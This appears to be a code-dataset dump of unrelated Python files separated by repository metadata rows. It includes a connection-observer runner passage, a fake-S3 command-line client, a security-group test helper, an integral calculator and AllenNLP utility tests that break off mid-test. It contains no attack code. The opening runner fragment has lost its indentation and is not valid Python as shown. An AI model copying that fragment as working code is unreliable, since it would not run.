self._stop_feeding(connection_observer, subscribed_data_receiver, feed_done, observer_lock)
def feed(self, connection_observer, subscribed_data_receiver, stop_feeding, feed_done,
observer_lock):
"""
Feeds connection_observer by transferring data from connection and passing it to connection_observer.
Should be called from background-processing of connection observer.
"""
remain_time, msg = his_remaining_time("remaining", timeout=connection_observer.timeout,
from_start_time=connection_observer.life_status.start_time)
self.logger.debug("thread started for {}, {}".format(connection_observer, msg))
if not subscribed_data_receiver:
subscribed_data_receiver = self._start_feeding(connection_observer, observer_lock)
time.sleep(self._tick) # give control back before we start processing
self._feed_loop(connection_observer, stop_feeding, observer_lock)
remain_time, msg = his_remaining_time("remaining", timeout=connection_observer.timeout,
from_start_time=connection_observer.life_status.start_time)
self.logger.debug("thread finished for {}, {}".format(connection_observer, msg))
self._stop_feeding(connection_observer, subscribed_data_receiver, feed_done, observer_lock)
return None
def _feed_loop(self, connection_observer, stop_feeding, observer_lock):
start_time = connection_observer.life_status.start_time
while True:
if stop_feeding.is_set():
# TODO: should it be renamed to 'cancelled' to be in sync with initial action?
self.logger.debug("stopped {}".format(connection_observer))
break
if connection_observer.done():
self.logger.debug("done {}".format(connection_observer))
break
current_time = time.time()
run_duration = current_time - start_time
# we need to check connection_observer.timeout at each round since timeout may change
# during lifetime of connection_observer
timeout = connection_observer.timeout
if connection_observer.life_status.in_terminating:
timeout = connection_observer.life_status.terminating_timeout
if (timeout is not None) and (run_duration >= timeout):
if connection_observer.life_status.in_terminating:
msg = "{} underlying real command failed to finish during {} seconds. It will be forcefully" \
" terminated".format(connection_observer, timeout)
self.logger.info(msg)
connection_observer.set_end_of_life()
else:
with observer_lock:
time_out_observer(connection_observer,
timeout=connection_observer.timeout,
passed_time=run_duration,
runner_logger=self.logger)
if connection_observer.life_status.terminating_timeout >= 0.0:
start_time = time.time()
connection_observer.life_status.in_terminating = True
else:
break
else:
self._call_on_inactivity(connection_observer=connection_observer, current_time=current_time)
if self._in_shutdown:
self.logger.debug("shutdown so cancelling {}".format(connection_observer))
connection_observer.cancel()
time.sleep(self._tick) # give moler_conn a chance to feed observer
def _call_on_inactivity(self, connection_observer, current_time):
"""
Call on_inactivity on connection_observer if needed.
:param connection_observer: ConnectionObserver object.
:param current_time: current time in seconds.
:return: None
"""
life_status = connection_observer.life_status
if (life_status.inactivity_timeout > 0.0) and (life_status.last_feed_time is not None):
expected_feed_timeout = life_status.last_feed_time + life_status.inactivity_timeout
if current_time > expected_feed_timeout:
connection_observer.on_inactivity()
connection_observer.life_status.last_feed_time = current_time
def timeout_change(self, timedelta):
pass
# utilities to be used by runners
def his_remaining_time(prefix, timeout, from_start_time):
"""
Calculate remaining time of "he" object assuming that "he" has .life_status.start_time attribute
:param prefix: string to be used inside 'remaining time description'
:param he: object to calculate remaining time for
:param timeout: max lifetime of object
:param from_start_time: start of lifetime for the object
:return: remaining time as float and related description message
"""
already_passed = time.time() - from_start_time
remain_time = timeout - already_passed
if remain_time < 0.0:
remain_time = 0.0
msg = "{} {:.3f} [sec], already passed {:.3f} [sec]".format(prefix, remain_time, already_passed)
return remain_time, msg
def await_future_or_eol(connection_observer, remain_time, start_time, timeout, logger):
# Observer lifetime started with its timeout clock
# but setting connection_observer._future may be delayed by nonempty commands queue.
# In such case we have to wait either for _future or timeout.
end_of_life = False
while (connection_observer._future is None) and (remain_time > 0.0):
time.sleep(0.005)
if connection_observer.done():
logger.debug("{} is done before creating future".format(connection_observer))
end_of_life = True
break
now = time.time()
already_passed = now - start_time
remain_time = timeout - already_passed
observer_lifetime_passed = now - connection_observer.life_status.start_time
remain_observer_lifetime = connection_observer.timeout + connection_observer.life_status.terminating_timeout\
- observer_lifetime_passed
# we timeout on earlier timeout (timeout or connection_observer.timeout)
if remain_observer_lifetime <= 0.0:
remain_time = 0.0
if remain_time <= 0.0:
logger.debug("{} timeout before creating future".format(connection_observer))
return end_of_life, remain_time
| 52.425121 | 133 | 0.657237 | 3,687 | 32,556 | 5.547871 | 0.129102 | 0.206795 | 0.045759 | 0.043803 | 0.45671 | 0.393253 | 0.34109 | 0.30198 | 0.256417 | 0.222391 | 0 | 0.003688 | 0.275341 | 32,556 | 620 | 134 | 52.509677 | 0.863344 | 0.270549 | 0 | 0.345646 | 0 | 0.002639 | 0.057111 | 0.005267 | 0 | 0 | 0 | 0.009677 | 0.005277 | 1 | 0.092348 | false | 0.050132 | 0.036939 | 0.002639 | 0.192612 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
8a298f59ca511939b6e86c5c2133a7995a173de1 | 112 | py | Python | Text Processing - exercise/extract file.py | DiyanKalaydzhiev23/fundamentals---python | 7fa032d9a3270648ffa383bb00dad8e51613189d | [
"MIT"
] | null | null | null | Text Processing - exercise/extract file.py | DiyanKalaydzhiev23/fundamentals---python | 7fa032d9a3270648ffa383bb00dad8e51613189d | [
"MIT"
] | null | null | null | Text Processing - exercise/extract file.py | DiyanKalaydzhiev23/fundamentals---python | 7fa032d9a3270648ffa383bb00dad8e51613189d | [
"MIT"
] | null | null | null | path = input().split("\\")
file = path[-1].split(".")
print(f"File name: {file[0]}\nFile extension: {file[1]}")
| 28 | 57 | 0.589286 | 17 | 112 | 3.882353 | 0.647059 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.029703 | 0.098214 | 112 | 3 | 58 | 37.333333 | 0.623762 | 0 | 0 | 0 | 0 | 0 | 0.446429 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
8a2da9b7d03fbffad915a30e08e6df6a2100f8a8 | 2,665 | py | Python | test/botocmd.py | Kajabi/fake-s3 | a28139fae48df11e3e21ca2a89df738130ab477e | [
"MIT"
] | 1 | 2022-02-24T05:34:25.000Z | 2022-02-24T05:34:25.000Z | test/botocmd.py | amione/fake-s3 | 2f31a962e8abaa7effe25931f1d2fd35d8a557da | [
"MIT"
] | null | null | null | test/botocmd.py | amione/fake-s3 | 2f31a962e8abaa7effe25931f1d2fd35d8a557da | [
"MIT"
] | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
# fakes3cmd.py -- an s3cmd-like script that accepts a custom host and portname
import re
import os
from optparse import OptionParser
try:
from boto.s3.connection import S3Connection, OrdinaryCallingFormat
from boto.s3.key import Key
except ImportError:
raise Exception('You must install the boto package for python')
class FakeS3Cmd(object):
COMMANDS = ['mb', 'rb', 'put', ]
def __init__(self, host, port):
self.host = host
self.port = port
self.conn = None
self._connect()
def _connect(self):
print 'Connecting: %s:%s' % (self.host, self.port)
self.conn = S3Connection(is_secure=False,
calling_format=OrdinaryCallingFormat(),
aws_access_key_id='',
aws_secret_access_key='',
port=self.port, host=self.host)
@staticmethod
def _parse_uri(path):
match = re.match(r's3://([^/]+)(?:/(.*))?', path, re.I)
## (bucket, key)
return match.groups()
def mb(self, path, *args):
if not self.conn:
self._connect()
bucket, _ = self._parse_uri(path)
self.conn.create_bucket(bucket)
print 'made bucket: [%s]' % bucket
def rb(self, path, *args):
if not self.conn:
self._connect()
bucket, _ = self._parse_uri(path)
self.conn.delete_bucket(bucket)
print 'removed bucket: [%s]' % bucket
def put(self, *args):
if not self.conn:
self._connect()
args = list(args)
path = args.pop()
bucket_name, prefix = self._parse_uri(path)
bucket = self.conn.get_bucket(bucket_name)
for src_file in args:
key = Key(bucket)
key.key = os.path.join(prefix, os.path.basename(src_file))
key.set_contents_from_filename(src_file)
print 'stored: [%s]' % key.key
if __name__ == "__main__":
# check for options. TODO: This requires a more verbose help message
# to explain how the positional arguments work.
parser = OptionParser()
parser.add_option("-t", "--host", type="string", default='localhost')
parser.add_option("-p", "--port", type='int', default=80)
o, args = parser.parse_args()
if len(args) < 2:
raise ValueError('you must minimally supply a desired command and s3 uri')
cmd = args.pop(0)
if cmd not in FakeS3Cmd.COMMANDS:
raise ValueError('%s is not a valid command' % cmd)
fs3 = FakeS3Cmd(o.host, o.port)
handler = getattr(fs3, cmd)
handler(*args)
| 30.284091 | 82 | 0.588743 | 334 | 2,665 | 4.550898 | 0.416168 | 0.042105 | 0.031579 | 0.025658 | 0.105263 | 0.105263 | 0.105263 | 0.086842 | 0.086842 | 0.086842 | 0 | 0.009469 | 0.286679 | 2,665 | 87 | 83 | 30.632184 | 0.79011 | 0.090807 | 0 | 0.142857 | 0 | 0 | 0.107616 | 0.009106 | 0 | 0 | 0 | 0.011494 | 0 | 0 | null | null | 0 | 0.095238 | null | null | 0.063492 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
8a2e3c368928b404fde473116276a9ed5cae8942 | 1,185 | py | Python | scripts/securitygroup/config.py | vkolli/contrail-test-perf | db04b8924a2c330baabe3059788b149d957a7d67 | [
"Apache-2.0"
] | 1 | 2017-06-13T04:42:34.000Z | 2017-06-13T04:42:34.000Z | scripts/securitygroup/config.py | vkolli/contrail-test-perf | db04b8924a2c330baabe3059788b149d957a7d67 | [
"Apache-2.0"
] | null | null | null | scripts/securitygroup/config.py | vkolli/contrail-test-perf | db04b8924a2c330baabe3059788b149d957a7d67 | [
"Apache-2.0"
] | null | null | null | import time
import paramiko
import fixtures
from fabric.api import run, hide, settings
from vn_test import VNFixture
from vm_test import VMFixture
from policy_test import PolicyFixture
from common.policy.config import ConfigPolicy
from common.connections import ContrailConnections
from security_group import SecurityGroupFixture
class ConfigSecGroup(ConfigPolicy):
def config_sec_group(self, name, secgrpid=None, entries=None):
secgrp_fixture = self.useFixture(SecurityGroupFixture(self.inputs,
self.connections, self.inputs.domain_name, self.inputs.project_name,
secgrp_name=name, uuid=secgrpid, secgrp_entries=entries))
result, msg = secgrp_fixture.verify_on_setup()
assert result, msg
return secgrp_fixture
def delete_sec_group(self, secgrp_fix):
secgrp_fix.cleanUp()
self.remove_from_cleanups(secgrp_fix)
def remove_from_cleanups(self, fix):
for cleanup in self._cleanups:
if fix.cleanUp in cleanup:
self._cleanups.remove(cleanup)
break
| 34.852941 | 130 | 0.672574 | 132 | 1,185 | 5.840909 | 0.431818 | 0.038911 | 0.031128 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.27173 | 1,185 | 33 | 131 | 35.909091 | 0.893395 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.038462 | 1 | 0.115385 | false | 0 | 0.384615 | 0 | 0.576923 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
8a340244538e5f22abe218a0a595984c86b99776 | 555 | py | Python | utils/integral_calculator.py | nomagiclab/balancing-ball | 28a2f95ee489cf7c1a2a3208412eda00e43835f3 | [
"MIT"
] | 4 | 2021-11-09T10:48:48.000Z | 2022-01-20T11:12:54.000Z | utils/integral_calculator.py | nomagiclab/balancing-ball | 28a2f95ee489cf7c1a2a3208412eda00e43835f3 | [
"MIT"
] | 16 | 2021-11-09T10:36:40.000Z | 2022-03-19T18:35:40.000Z | utils/integral_calculator.py | nomagiclab/balancing-ball | 28a2f95ee489cf7c1a2a3208412eda00e43835f3 | [
"MIT"
] | null | null | null | class IntegralCalculator:
def __init__(self):
self.value = 0
self.last_time = 0
def get_current_integral(self) -> float:
return self.value
def get_and_update_integral(self, new_x, new_time) -> float:
self.update_integral(new_x, new_time)
return self.get_current_integral()
def update_integral(self, new_x, new_time):
if self.last_time == 0:
self.last_time = new_time
dt = new_time - self.last_time
self.value += dt * new_x
self.last_time = new_time
| 25.227273 | 64 | 0.632432 | 78 | 555 | 4.141026 | 0.25641 | 0.130031 | 0.185759 | 0.102167 | 0.297214 | 0.179567 | 0.179567 | 0 | 0 | 0 | 0 | 0.007519 | 0.281081 | 555 | 21 | 65 | 26.428571 | 0.802005 | 0 | 0 | 0.133333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.266667 | false | 0 | 0 | 0.066667 | 0.466667 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
8a3486a4d71febd1848dbba2347c1a355f222185 | 217 | py | Python | crabageprediction/venv/Lib/site-packages/pandas/io/formats/__init__.py | 13rianlucero/CrabAgePrediction | 92bc7fbe1040f49e820473e33cc3902a5a7177c7 | [
"MIT"
] | 28,899 | 2016-10-13T03:32:12.000Z | 2022-03-31T21:39:05.000Z | crabageprediction/venv/Lib/site-packages/pandas/io/formats/__init__.py | 13rianlucero/CrabAgePrediction | 92bc7fbe1040f49e820473e33cc3902a5a7177c7 | [
"MIT"
] | 31,004 | 2016-10-12T23:22:27.000Z | 2022-03-31T23:17:38.000Z | crabageprediction/venv/Lib/site-packages/pandas/io/formats/__init__.py | 13rianlucero/CrabAgePrediction | 92bc7fbe1040f49e820473e33cc3902a5a7177c7 | [
"MIT"
] | 15,149 | 2016-10-13T03:21:31.000Z | 2022-03-31T18:46:47.000Z | from typing import TYPE_CHECKING
if TYPE_CHECKING:
# import modules that have public classes/functions
from pandas.io.formats import style
# and mark only those modules as public
__all__ = ["style"]
| 24.111111 | 55 | 0.737327 | 30 | 217 | 5.133333 | 0.733333 | 0.155844 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.211982 | 217 | 8 | 56 | 27.125 | 0.900585 | 0.400922 | 0 | 0 | 0 | 0 | 0.03937 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
8a35d65e141b12d524977df842b606ea2f5482d6 | 71,598 | py | Python | allennlp/tests/nn/util_test.py | apmoore1/allennlp | bdb29a831ed68cb948b18b42fa61646b9ec11bf8 | [
"Apache-2.0"
] | null | null | null | allennlp/tests/nn/util_test.py | apmoore1/allennlp | bdb29a831ed68cb948b18b42fa61646b9ec11bf8 | [
"Apache-2.0"
] | null | null | null | allennlp/tests/nn/util_test.py | apmoore1/allennlp | bdb29a831ed68cb948b18b42fa61646b9ec11bf8 | [
"Apache-2.0"
] | 1 | 2020-02-19T11:34:32.000Z | 2020-02-19T11:34:32.000Z | import json
import random
from typing import NamedTuple, Any
import numpy
from numpy.testing import assert_array_almost_equal, assert_almost_equal
import torch
import pytest
from flaky import flaky
from allennlp.common.checks import ConfigurationError
from allennlp.common.testing import AllenNlpTestCase
from allennlp.common.util import sanitize
from allennlp.nn import util
from allennlp.models import load_archive
class TestNnUtil(AllenNlpTestCase):
def test_get_sequence_lengths_from_binary_mask(self):
binary_mask = torch.tensor(
[
[True, True, True, False, False, False],
[True, True, False, False, False, False],
[True, True, True, True, True, True],
[True, False, False, False, False, False],
]
)
lengths = util.get_lengths_from_binary_sequence_mask(binary_mask)
numpy.testing.assert_array_equal(lengths.numpy(), numpy.array([3, 2, 6, 1]))
def test_get_mask_from_sequence_lengths(self):
sequence_lengths = torch.LongTensor([4, 3, 1, 4, 2])
mask = util.get_mask_from_sequence_lengths(sequence_lengths, 5).data.numpy()
assert_almost_equal(
mask,
[[1, 1, 1, 1, 0], [1, 1, 1, 0, 0], [1, 0, 0, 0, 0], [1, 1, 1, 1, 0], [1, 1, 0, 0, 0]],
)
def test_get_sequence_lengths_converts_to_long_tensor_and_avoids_variable_overflow(self):
# Tests the following weird behaviour in Pytorch 0.1.12
# doesn't happen for our sequence masks:
#
# mask = torch.ones([260]).bool()
# mask.sum() # equals 260.
# var_mask = t.a.V(mask)
# var_mask.sum() # equals 4, due to 8 bit precision - the sum overflows.
binary_mask = torch.ones(2, 260).bool()
lengths = util.get_lengths_from_binary_sequence_mask(binary_mask)
numpy.testing.assert_array_equal(lengths.data.numpy(), numpy.array([260, 260]))
def test_clamp_tensor(self):
# Test on uncoalesced sparse tensor
i = torch.LongTensor([[0, 1, 1, 0], [2, 0, 2, 2]])
v = torch.FloatTensor([3, 4, -5, 3])
tensor = torch.sparse.FloatTensor(i, v, torch.Size([2, 3]))
clamped_tensor = util.clamp_tensor(tensor, minimum=-3, maximum=3).to_dense()
assert_almost_equal(clamped_tensor, [[0, 0, 3], [3, 0, -3]])
# Test on coalesced sparse tensor
i = torch.LongTensor([[0, 1, 1], [2, 0, 2]])
v = torch.FloatTensor([3, 4, -5])
tensor = torch.sparse.FloatTensor(i, v, torch.Size([2, 3]))
clamped_tensor = util.clamp_tensor(tensor, minimum=-3, maximum=3).to_dense()
assert_almost_equal(clamped_tensor, [[0, 0, 3], [3, 0, -3]])
# Test on dense tensor
tensor = torch.tensor([[5, -4, 3], [-3, 0, -30]])
clamped_tensor = util.clamp_tensor(tensor, minimum=-3, maximum=3)
assert_almost_equal(clamped_tensor, [[3, -3, 3], [-3, 0, -3]])
def test_sort_tensor_by_length(self):
tensor = torch.rand([5, 7, 9])
tensor[0, 3:, :] = 0
tensor[1, 4:, :] = 0
tensor[2, 1:, :] = 0
tensor[3, 5:, :] = 0
sequence_lengths = torch.LongTensor([3, 4, 1, 5, 7])
sorted_tensor, sorted_lengths, reverse_indices, _ = util.sort_batch_by_length(
tensor, sequence_lengths
)
# Test sorted indices are padded correctly.
numpy.testing.assert_array_equal(sorted_tensor[1, 5:, :].data.numpy(), 0.0)
numpy.testing.assert_array_equal(sorted_tensor[2, 4:, :].data.numpy(), 0.0)
numpy.testing.assert_array_equal(sorted_tensor[3, 3:, :].data.numpy(), 0.0)
numpy.testing.assert_array_equal(sorted_tensor[4, 1:, :].data.numpy(), 0.0)
assert sorted_lengths.data.equal(torch.LongTensor([7, 5, 4, 3, 1]))
# Test restoration indices correctly recover the original tensor.
assert sorted_tensor.index_select(0, reverse_indices).data.equal(tensor.data)
def test_get_final_encoder_states(self):
encoder_outputs = torch.Tensor(
[
[[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]],
[[13, 14, 15, 16], [17, 18, 19, 20], [21, 22, 23, 24]],
]
)
mask = torch.tensor([[True, True, True], [True, True, False]])
final_states = util.get_final_encoder_states(encoder_outputs, mask, bidirectional=False)
assert_almost_equal(final_states.data.numpy(), [[9, 10, 11, 12], [17, 18, 19, 20]])
final_states = util.get_final_encoder_states(encoder_outputs, mask, bidirectional=True)
assert_almost_equal(final_states.data.numpy(), [[9, 10, 3, 4], [17, 18, 15, 16]])
def test_masked_softmax_no_mask(self):
# Testing the general unmasked 1D case.
vector_1d = torch.FloatTensor([[1.0, 2.0, 3.0]])
vector_1d_softmaxed = util.masked_softmax(vector_1d, None).data.numpy()
assert_array_almost_equal(
vector_1d_softmaxed, numpy.array([[0.090031, 0.244728, 0.665241]])
)
assert_almost_equal(1.0, numpy.sum(vector_1d_softmaxed), decimal=6)
vector_1d = torch.FloatTensor([[1.0, 2.0, 5.0]])
vector_1d_softmaxed = util.masked_softmax(vector_1d, None).data.numpy()
assert_array_almost_equal(vector_1d_softmaxed, numpy.array([[0.017148, 0.046613, 0.93624]]))
# Testing the unmasked 1D case where the input is all 0s.
vector_zero = torch.FloatTensor([[0.0, 0.0, 0.0]])
vector_zero_softmaxed = util.masked_softmax(vector_zero, None).data.numpy()
assert_array_almost_equal(
vector_zero_softmaxed, numpy.array([[0.33333334, 0.33333334, 0.33333334]])
)
# Testing the general unmasked batched case.
matrix = torch.FloatTensor([[1.0, 2.0, 5.0], [1.0, 2.0, 3.0]])
masked_matrix_softmaxed = util.masked_softmax(matrix, None).data.numpy()
assert_array_almost_equal(
masked_matrix_softmaxed,
numpy.array(
[[0.01714783, 0.04661262, 0.93623955], [0.09003057, 0.24472847, 0.66524096]]
),
)
# Testing the unmasked batched case where one of the inputs are all 0s.
matrix = torch.FloatTensor([[1.0, 2.0, 5.0], [0.0, 0.0, 0.0]])
masked_matrix_softmaxed = util.masked_softmax(matrix, None).data.numpy()
assert_array_almost_equal(
masked_matrix_softmaxed,
numpy.array(
[[0.01714783, 0.04661262, 0.93623955], [0.33333334, 0.33333334, 0.33333334]]
),
)
def test_masked_softmax_masked(self):
# Testing the general masked 1D case.
vector_1d = torch.FloatTensor([[1.0, 2.0, 5.0]])
mask_1d = torch.tensor([[True, False, True]])
vector_1d_softmaxed = util.masked_softmax(vector_1d, mask_1d).data.numpy()
assert_array_almost_equal(vector_1d_softmaxed, numpy.array([[0.01798621, 0.0, 0.98201382]]))
vector_1d = torch.FloatTensor([[0.0, 2.0, 3.0, 4.0]])
mask_1d = torch.tensor([[True, False, True, True]])
vector_1d_softmaxed = util.masked_softmax(vector_1d, mask_1d).data.numpy()
assert_array_almost_equal(
vector_1d_softmaxed, numpy.array([[0.01321289, 0.0, 0.26538793, 0.72139918]])
)
# Testing the masked 1D case where the input is all 0s and the mask
# is not all 0s.
vector_1d = torch.FloatTensor([[0.0, 0.0, 0.0, 0.0]])
mask_1d = torch.tensor([[False, False, False, True]])
vector_1d_softmaxed = util.masked_softmax(vector_1d, mask_1d).data.numpy()
assert_array_almost_equal(vector_1d_softmaxed, numpy.array([[0, 0, 0, 1]]))
# Testing the masked 1D case where the input is not all 0s
# and the mask is all 0s.
vector_1d = torch.FloatTensor([[0.0, 2.0, 3.0, 4.0]])
mask_1d = torch.tensor([[False, False, False, False]])
vector_1d_softmaxed = util.masked_softmax(vector_1d, mask_1d).data.numpy()
assert_array_almost_equal(vector_1d_softmaxed, numpy.array([[0.0, 0.0, 0.0, 0.0]]))
# Testing the masked 1D case where the input is all 0s and
# the mask is all 0s.
vector_1d = torch.FloatTensor([[0.0, 0.0, 0.0, 0.0]])
mask_1d = torch.tensor([[False, False, False, False]])
vector_1d_softmaxed = util.masked_softmax(vector_1d, mask_1d).data.numpy()
assert_array_almost_equal(vector_1d_softmaxed, numpy.array([[0.0, 0.0, 0.0, 0.0]]))
# Testing the masked 1D case where there are large elements in the
# padding.
vector_1d = torch.FloatTensor([[1.0, 1.0, 1e5]])
mask_1d = torch.tensor([[True, True, False]])
vector_1d_softmaxed = util.masked_softmax(vector_1d, mask_1d).data.numpy()
assert_array_almost_equal(vector_1d_softmaxed, numpy.array([[0.5, 0.5, 0]]))
# Testing the general masked batched case.
matrix = torch.FloatTensor([[1.0, 2.0, 5.0], [1.0, 2.0, 3.0]])
mask = torch.tensor([[True, False, True], [True, True, True]])
masked_matrix_softmaxed = util.masked_softmax(matrix, mask).data.numpy()
assert_array_almost_equal(
masked_matrix_softmaxed,
numpy.array([[0.01798621, 0.0, 0.98201382], [0.090031, 0.244728, 0.665241]]),
)
# Testing the masked batch case where one of the inputs is all 0s but
# none of the masks are all 0.
matrix = torch.FloatTensor([[0.0, 0.0, 0.0], [1.0, 2.0, 3.0]])
mask = torch.tensor([[True, False, True], [True, True, True]])
masked_matrix_softmaxed = util.masked_softmax(matrix, mask).data.numpy()
assert_array_almost_equal(
masked_matrix_softmaxed, numpy.array([[0.5, 0.0, 0.5], [0.090031, 0.244728, 0.665241]])
)
# Testing the masked batch case where one of the inputs is all 0s and
# one of the masks are all 0.
matrix = torch.FloatTensor([[0.0, 0.0, 0.0], [1.0, 2.0, 3.0]])
mask = torch.tensor([[True, False, True], [False, False, False]])
masked_matrix_softmaxed = util.masked_softmax(matrix, mask).data.numpy()
assert_array_almost_equal(
masked_matrix_softmaxed, numpy.array([[0.5, 0.0, 0.5], [0.0, 0.0, 0.0]])
)
matrix = torch.FloatTensor([[0.0, 0.0, 0.0], [1.0, 2.0, 3.0]])
mask = torch.tensor([[False, False, False], [True, False, True]])
masked_matrix_softmaxed = util.masked_softmax(matrix, mask).data.numpy()
assert_array_almost_equal(
masked_matrix_softmaxed, numpy.array([[0.0, 0.0, 0.0], [0.11920292, 0.0, 0.88079708]])
)
def test_masked_softmax_memory_efficient_masked(self):
# Testing the general masked 1D case.
vector_1d = torch.FloatTensor([[1.0, 2.0, 5.0]])
mask_1d = torch.tensor([[True, False, True]])
vector_1d_softmaxed = util.masked_softmax(
vector_1d, mask_1d, memory_efficient=True
).data.numpy()
assert_array_almost_equal(vector_1d_softmaxed, numpy.array([[0.01798621, 0.0, 0.98201382]]))
vector_1d = torch.FloatTensor([[0.0, 2.0, 3.0, 4.0]])
mask_1d = torch.tensor([[True, False, True, True]])
vector_1d_softmaxed = util.masked_softmax(
vector_1d, mask_1d, memory_efficient=True
).data.numpy()
assert_array_almost_equal(
vector_1d_softmaxed, numpy.array([[0.01321289, 0.0, 0.26538793, 0.72139918]])
)
# Testing the masked 1D case where the input is all 0s and the mask
# is not all 0s.
vector_1d = torch.FloatTensor([[0.0, 0.0, 0.0, 0.0]])
mask_1d = torch.tensor([[False, False, False, True]])
vector_1d_softmaxed = util.masked_softmax(
vector_1d, mask_1d, memory_efficient=True
).data.numpy()
assert_array_almost_equal(vector_1d_softmaxed, numpy.array([[0, 0, 0, 1]]))
# Testing the masked 1D case where the input is not all 0s
# and the mask is all 0s.
vector_1d = torch.FloatTensor([[0.0, 2.0, 3.0, 4.0]])
mask_1d = torch.tensor([[False, False, False, False]])
vector_1d_softmaxed = util.masked_softmax(
vector_1d, mask_1d, memory_efficient=True
).data.numpy()
assert_array_almost_equal(vector_1d_softmaxed, numpy.array([[0.25, 0.25, 0.25, 0.25]]))
# Testing the masked 1D case where the input is all 0s and
# the mask is all 0s.
vector_1d = torch.FloatTensor([[0.0, 0.0, 0.0, 0.0]])
mask_1d = torch.tensor([[False, False, False, False]])
vector_1d_softmaxed = util.masked_softmax(
vector_1d, mask_1d, memory_efficient=True
).data.numpy()
assert_array_almost_equal(vector_1d_softmaxed, numpy.array([[0.25, 0.25, 0.25, 0.25]]))
# Testing the masked 1D case where there are large elements in the
# padding.
vector_1d = torch.FloatTensor([[1.0, 1.0, 1e5]])
mask_1d = torch.tensor([[True, True, False]])
vector_1d_softmaxed = util.masked_softmax(
vector_1d, mask_1d, memory_efficient=True
).data.numpy()
assert_array_almost_equal(vector_1d_softmaxed, numpy.array([[0.5, 0.5, 0]]))
# Testing the general masked batched case.
matrix = torch.FloatTensor([[1.0, 2.0, 5.0], [1.0, 2.0, 3.0]])
mask = torch.tensor([[True, False, True], [True, True, True]])
masked_matrix_softmaxed = util.masked_softmax(
matrix, mask, memory_efficient=True
).data.numpy()
assert_array_almost_equal(
masked_matrix_softmaxed,
numpy.array([[0.01798621, 0.0, 0.98201382], [0.090031, 0.244728, 0.665241]]),
)
# Testing the masked batch case where one of the inputs is all 0s but
# none of the masks are all 0.
matrix = torch.FloatTensor([[0.0, 0.0, 0.0], [1.0, 2.0, 3.0]])
mask = torch.tensor([[True, False, True], [True, True, True]])
masked_matrix_softmaxed = util.masked_softmax(
matrix, mask, memory_efficient=True
).data.numpy()
assert_array_almost_equal(
masked_matrix_softmaxed, numpy.array([[0.5, 0.0, 0.5], [0.090031, 0.244728, 0.665241]])
)
# Testing the masked batch case where one of the inputs is all 0s and
# one of the masks are all 0.
matrix = torch.FloatTensor([[0.0, 0.0, 0.0], [1.0, 2.0, 3.0]])
mask = torch.tensor([[True, False, True], [False, False, False]])
masked_matrix_softmaxed = util.masked_softmax(
matrix, mask, memory_efficient=True
).data.numpy()
assert_array_almost_equal(
masked_matrix_softmaxed,
numpy.array([[0.5, 0.0, 0.5], [0.33333333, 0.33333333, 0.33333333]]),
)
matrix = torch.FloatTensor([[0.0, 0.0, 0.0], [1.0, 2.0, 3.0]])
mask = torch.tensor([[False, False, False], [True, False, True]])
masked_matrix_softmaxed = util.masked_softmax(
matrix, mask, memory_efficient=True
).data.numpy()
assert_array_almost_equal(
masked_matrix_softmaxed,
numpy.array([[0.33333333, 0.33333333, 0.33333333], [0.11920292, 0.0, 0.88079708]]),
)
def test_masked_log_softmax_masked(self):
# Tests replicated from test_softmax_masked - we test that exponentiated,
# the log softmax contains the correct elements (masked elements should be == 1).
# Testing the general masked 1D case.
vector_1d = torch.FloatTensor([[1.0, 2.0, 5.0]])
mask_1d = torch.tensor([[True, False, True]])
vector_1d_softmaxed = util.masked_log_softmax(vector_1d, mask_1d).data.numpy()
assert_array_almost_equal(
numpy.exp(vector_1d_softmaxed), numpy.array([[0.01798621, 0.0, 0.98201382]])
)
vector_1d = torch.FloatTensor([[0.0, 2.0, 3.0, 4.0]])
mask_1d = torch.tensor([[True, False, True, True]])
